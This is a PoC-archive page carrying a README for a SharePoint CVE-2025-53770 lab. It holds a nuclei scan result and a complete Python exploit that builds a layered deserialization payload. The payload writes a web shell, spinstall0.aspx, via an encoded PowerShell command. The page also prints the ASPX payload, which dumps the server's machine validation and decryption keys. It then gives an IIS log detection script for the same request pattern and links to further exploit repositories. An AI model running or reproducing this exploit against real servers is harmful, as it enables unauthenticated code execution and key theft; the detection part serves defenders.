Related vulnerability
Description
CVE-2025-53770 lab environment
Introduction
# sharepoint-CVE-2025-53770
CVE-2025-53770 lab environment
Installation tutorials:
https://www.cnblogs.com/jianyus/p/9874010.html
https://www.cnblogs.com/life512/p/13713483.html
https://www.cnblogs.com/cqpanda/p/16148822.html
https://vladilen.com/content/sharepoint-keys
https://blog.csdn.net/liuzhenhe1988/article/details/112938419
Testing:
https://github.com/projectdiscovery/nuclei/releases/tag/v3.4.10
```
└─$ ./nuclei -t http/cves/2025/CVE-2025-53770.yaml -u http://192.168.139.143
                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io
[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[CVE-2025-53770] [http] [critical] http://192.168.139.143/_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx
[INF] Scan completed in 3.408841065s. 1 matches found.
```
Upload:
```
import base64
import gzip
import urllib.parse
import requests


def BuildPayload(APSXPayloadFile: str):
    def Step1(APSXPayloadFile):
        with open(APSXPayloadFile, 'rb') as apsxp:
            Payload = apsxp.read()
        PayloadEncoded = base64.b64encode(Payload)
        return PayloadEncoded

    def Step2(PayloadEncoded):
        PowerShellPayload = f"""
$base64String = {PayloadEncoded}
$destinationFile = "C:\\PROGRA~1\\COMMON~1\\MICROS~1\\WEBSER~1\\16\\TEMPLATE\\LAYOUTS\\spinstall0.aspx"
$decodedBytes = [System.Convert]::FromBase64String($base64String)
$decodedContent = [System.Text.Encoding]::UTF8.GetString($decodedBytes)
$decodedContent | Set-Content -Path $destinationFile -ErrorAction Stop
"""
        PowerShellPayloadBase64Encoded = base64.b64encode(bytes(PowerShellPayload, 'utf-8')).decode('utf-8')
        PowerShellPayloadExecuterCommand = f"powershell -EncodedCommand {PowerShellPayloadBase64Encoded}"
        return PowerShellPayloadExecuterCommand

    def Step3(PowerShellPayloadExecuterCommand):
        PowerShellPayloadExecuterCommandBase64Encoded = base64.b64encode(bytes(PowerShellPayloadExecuterCommand, 'utf-8')).decode('utf-8')
        Payload = f'<pwn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><ExpandedWrapperOfLosFormatterObjectDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" ><ExpandedElement/><ProjectedProperty0><MethodName>Deserialize</MethodName><MethodParameters><anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string"> {PowerShellPayloadExecuterCommandBase64Encoded}</anyType></MethodParameters><ObjectInstance xsi:type="LosFormatter"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfLosFormatterObjectDataProvider></pwn>'
        PayloadBase64Encoded = base64.b64encode(bytes(Payload, 'utf-8')).decode('utf-8')
        PayloadGunziped = gzip.compress(bytes(PayloadBase64Encoded, 'utf-8'))
        return PayloadGunziped

    def Step4(PayloadGunziped):
        PayloadGunzipedBase64Encoded = base64.b64encode(PayloadGunziped).decode('utf-8')
        FinalPayload = f'<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %><%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %><asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest"><ProgressTemplate><div class="divWaiting"><Scorecard:ExcelDataSet CompressedDataTable="{PayloadGunzipedBase64Encoded}" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet></div</ProgressTemplate></asp:UpdateProgress>'
        FinalPayloadURLEncoded = urllib.parse.quote(FinalPayload)
        return FinalPayloadURLEncoded

    PayloadFileEncoded = Step1(APSXPayloadFile)
    #print(f"\nPayload File Base64 Encoded: {bytes(PayloadFileEncoded).decode('utf-8')}")
    PowerShellPayloadEncoded = Step2(bytes(PayloadFileEncoded).decode('utf-8'))
    #print(f"\nPowerShell Payload Base64 Encoded: {PowerShellPayloadEncoded}")
    PayloadGzipped = Step3(PowerShellPayloadEncoded)
    #print(f"\nPayload GZipped: {PayloadGzipped}")
    #PayloadUnGzipped = gzip.decompress(PayloadGzipped)
    #print(f"\nPayload Un Gzipped: {PayloadUnGzipped.decode('utf-8')}")
    FinalPayloadURLEncoded = Step4(PayloadGzipped)
    #print(f"\nFinal Payload URL Encoded: {FinalPayloadURLEncoded}")
    return FinalPayloadURLEncoded


def BuildHTTPRawRequest(TargetSite, TargetSiteSchema, UserAgent, Payload):
    RawRequest = f"""
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: {TargetSite}
User-Agent: {UserAgent}
Accept: */*
Referer: /_layouts/SignOut.aspx
Content-Type: application/x-www-form-urlencoded
Content-Length: {len(Payload)}
MSOTlPn_Uri={urllib.parse.quote(f"{TargetSiteSchema}{TargetSite}")}&MSOTlPn_DWP={urllib.parse.quote(Payload)}
"""
    return RawRequest


def RunAttack(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload):
    headers = {
        'User-Agent': UserAgent,
        'Referer': '/_layouts/SignOut.aspx',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    data = {
        'MSOTlPn_Uri': f'{TargetSiteSchemaPrefix}{TargetSite}',
        'MSOTlPn_DWP': Payload,
    }
    response = requests.post(
        f'{TargetSiteSchemaPrefix}{TargetSite}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx',
        headers=headers,
        data=data,
        verify=False,
    )
    return response.text


def Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath):
    Payload = BuildPayload(PayloadFilePath)
    RawHTTPRequest = BuildHTTPRawRequest(TargetSite, TargetSiteSchemaPrefix, UserAgent, Payload)
    print(f"\n {'-'*10} PoC Request {'-'*10}\n {RawHTTPRequest}")


if __name__ == "__main__":
    TargetSite = 'example.com'
    PayloadFilePath = 'pwn.aspx'
    TargetSiteSchemaPrefix = "http://"
    UserAgent = "example/0.0.0"
    Start(TargetSite, TargetSiteSchemaPrefix, UserAgent, PayloadFilePath)
```
Exploitation
```
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script runat="server" language="c#" CODEPAGE="65001">
    public void Page_load()
    {
        var sy = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
        var mkt = sy.GetType("System.Web.Configuration.MachineKeySection");
        var gac = mkt.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
        var cg = (System.Web.Configuration.MachineKeySection)gac.Invoke(null, new object[0]);
        Response.Write(cg.ValidationKey+"|"+cg.Validation+"|"+cg.DecryptionKey+"|"+cg.Decryption+"|"+cg.CompatibilityMode);
    }
</script>
```
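As an added defensive example (not part of this README or of any of the linked PoC repositories): a small Python checker that parses IIS W3C log lines and flags the request pattern the upload script above produces, a POST to /_layouts/15/ToolPane.aspx with DisplayMode=Edit and a Referer of /_layouts/SignOut.aspx, plus two related indicators: an unauthenticated ToolPane edit POST, and any request for the spinstall0.aspx filename that the PowerShell stage writes into the LAYOUTS directory. The log lines, IP addresses and user names are constructed for the example; the column layout follows the standard IIS #Fields header, and the rule names are my own.

```python
"""Hypothetical detection helper for the ToolShell (CVE-2025-53770) request
pattern shown in the PoC above, run over constructed IIS W3C log lines."""
from __future__ import annotations

from urllib.parse import unquote

# Constructed sample log (not a real capture). Column order follows the
# #Fields directive exactly as IIS writes it.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-20 10:15:01 10.0.0.5 GET /_layouts/15/start.aspx - 443 CONTOSO\\alice 10.0.0.20 Mozilla/5.0 - 200
2025-07-20 10:15:07 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.10 example/0.0.0 /_layouts/SignOut.aspx 200
2025-07-20 10:15:09 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.10 example/0.0.0 - 200
2025-07-20 10:16:00 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CONTOSO\\bob 10.0.0.21 Mozilla/5.0 https://10.0.0.5/sites/team/SitePages/Home.aspx 200
"""

TOOLPANE_STEM = "/_layouts/15/toolpane.aspx"
DROPPED_FILE = "spinstall0.aspx"  # filename used by the PoC's PowerShell stage


def parse_iis_w3c(text: str) -> list[dict[str, str]]:
    """Parse W3C extended log text into dicts keyed by the #Fields names."""
    fields: list[str] = []
    records: list[dict[str, str]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # #Software, #Date and other directives
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than misalign columns
        records.append(dict(zip(fields, values)))
    return records


def classify(rec: dict[str, str]) -> list[str]:
    """Return the rule names a single log record matches (empty if benign)."""
    reasons: list[str] = []
    # Normalise: URL-decode, lower-case, and drop a trailing slash so the
    # "ToolPane.aspx/?DisplayMode=Edit" variant seen in the nuclei hit matches too.
    stem = unquote(rec.get("cs-uri-stem", "")).lower().rstrip("/")
    query = unquote(rec.get("cs-uri-query", "")).lower()
    referer = unquote(rec.get("cs(Referer)", "")).lower().rstrip("/")
    user = rec.get("cs-username", "-")
    method = rec.get("cs-method", "").upper()

    if method == "POST" and stem == TOOLPANE_STEM:
        if referer.endswith("/_layouts/signout.aspx"):
            reasons.append("toolpane_post_with_signout_referer")
        if user == "-" and "displaymode=edit" in query:
            reasons.append("unauthenticated_toolpane_edit_post")
    if stem.endswith("/" + DROPPED_FILE):
        reasons.append("known_webshell_filename_requested")
    return reasons


def scan_iis_log(text: str) -> list[dict[str, object]]:
    """Run classify() over every record and collect the suspicious ones."""
    findings: list[dict[str, object]] = []
    for rec in parse_iis_w3c(text):
        reasons = classify(rec)
        if reasons:
            findings.append({
                "time": f"{rec.get('date', '?')} {rec.get('time', '?')}",
                "client": rec.get("c-ip", "?"),
                "uri": rec.get("cs-uri-stem", "?"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        print(f"{hit['time']} {hit['client']} {hit['uri']} -> {', '.join(hit['reasons'])}")
```

The authenticated edit POST from CONTOSO\bob with a normal page Referer is deliberately left unflagged, so the rules key on the SignOut.aspx Referer and the missing user rather than on ToolPane.aspx alone, which legitimate page editing also hits. Point `scan_iis_log` at the contents of a real `u_ex*.log` file to use it outside the sample.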
Links:
https://hawktrace.com/blog/cve-2025-53772
https://github.com/BirdsAreFlyingCameras/CVE-2025-53770_Raw-HTTP-Request-Generator
https://github.com/hazcod/CVE-2025-53770
https://github.com/exfil0/CVE-2025-53770/tree/main
https://github.com/soltanali0/CVE-2025-53770-Exploit/tree/main
https://github.com/unk9vvn/sharepoint-toolpane
https://github.com/3a7/CVE-2025-53770/tree/main
https://github.com/saladin0x1/CVE-2025-53770
File snapshot
[4.0K] /data/pocs/533e929966f6942861233eb09c2019e3b1c29371
└── [7.6K] README.md
0 directories, 1 file
Notes
1. Accessing the PoC through the original source is recommended.
2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.